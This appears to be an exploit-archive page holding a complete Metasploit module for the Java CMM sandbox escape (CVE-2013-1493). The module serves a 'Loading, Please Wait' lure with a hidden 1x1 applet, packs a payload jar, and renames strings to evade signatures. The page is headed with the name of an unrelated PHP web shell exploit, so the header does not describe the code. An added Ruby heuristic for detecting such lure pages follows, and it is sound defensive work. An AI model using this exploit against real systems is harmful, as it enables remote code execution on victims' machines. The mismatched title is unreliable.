
STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',      # Vulnerability discovery and Exploit
          'juan vazquez'  # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # The applet's class files ship with the framework under data/exploits/cve-2013-1493
  # and are read into memory once, when the module is set up.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # The entry class gets a random name so the served file name is not a static signature.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Rename the well-known "metasploit"/"Payload" strings inside the jar entries.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # A minimal "loading" page whose only content is a 1x1 applet pointing at a randomly named jar.
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
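From a defender's side, the page generate_html builds has a recognisable shape: a near-empty "Loading, Please Wait" document whose only real content is a 1x1 applet pulling a .jar. The following Ruby script is an added example, not part of the original post or of the Metasploit module, that scores served HTML against that shape. The function names, the 80-character "thin page" threshold and both sample pages are constructed for this example; it runs stand-alone with no Metasploit dependency.

```ruby
# Added example, not part of the original post or of the Metasploit module:
# a heuristic check for HTML pages shaped like the lure generate_html serves
# (a near-empty "loading" page whose only payload is a hidden 1x1 <applet>
# pulling a .jar). Function names, the thin-page threshold and the sample
# pages below are constructed for this example.

APPLET_TAG = /<applet\b([^>]*)>/i

# Pull one attribute value out of an applet tag's attribute string.
def applet_attr(attrs, name)
  m = attrs.match(/\b#{name}\s*=\s*["']?([^"'\s>]+)/i)
  m && m[1]
end

# Visible text of the page with all tags removed, used to measure how
# little the page shows the user besides the applet.
def visible_text(html)
  html.gsub(/<[^>]*>/, ' ').gsub(/\s+/, ' ').strip
end

# Returns an array of human-readable findings; empty means nothing matched.
def applet_lure_findings(html)
  findings = []
  jar_applets = []
  html.scan(APPLET_TAG).flatten.each do |attrs|
    archive = applet_attr(attrs, 'archive')
    next unless archive && archive =~ /\.jar\z/i
    jar_applets << archive
    width  = applet_attr(attrs, 'width')
    height = applet_attr(attrs, 'height')
    # Heuristic 1: the applet is sized so the user cannot see it.
    if width && height && width.to_i <= 1 && height.to_i <= 1
      findings << "hidden #{width}x#{height} applet loading #{archive}"
    end
  end
  # Heuristic 2: the page carries almost no content besides the applet,
  # as with the "Loading, Please Wait..." boilerplate in generate_html.
  text = visible_text(html)
  if !jar_applets.empty? && text.length < 80
    findings << "thin page (#{text.length} chars of text) loading #{jar_applets.join(', ')}"
  end
  findings
end

# Constructed sample: the shape of the page generate_html builds.
LURE_SAMPLE = '<html><head><title>Loading, Please Wait...</title></head>' \
              '<body><center><p>Loading, Please Wait...</p></center>' \
              '<applet archive="kTzQpLwA.jar" code="XyZw.class" width="1" height="1">' \
              '</applet></body></html>'

# Constructed sample: an ordinary visible applet on a page with real content.
BENIGN_SAMPLE = '<html><head><title>Chess</title></head><body><h1>Play chess</h1>' \
                '<p>Use the board below to play against the computer. Click a piece ' \
                'to select it, then click the destination square to move it.</p>' \
                '<applet archive="chess.jar" code="Chess.class" width="640" height="480">' \
                '</applet></body></html>'

if __FILE__ == $PROGRAM_NAME
  [LURE_SAMPLE, BENIGN_SAMPLE].each do |page|
    findings = applet_lure_findings(page)
    puts(findings.empty? ? 'clean' : findings.join('; '))
  end
end
```

Run on the two samples, the lure page produces two findings (a hidden 1x1 applet and a thin page) and the chess page none. Both heuristics are deliberately independent of file names, because the module randomises the jar and class names on every request; what it cannot randomise is the page layout it needs to auto-load the applet.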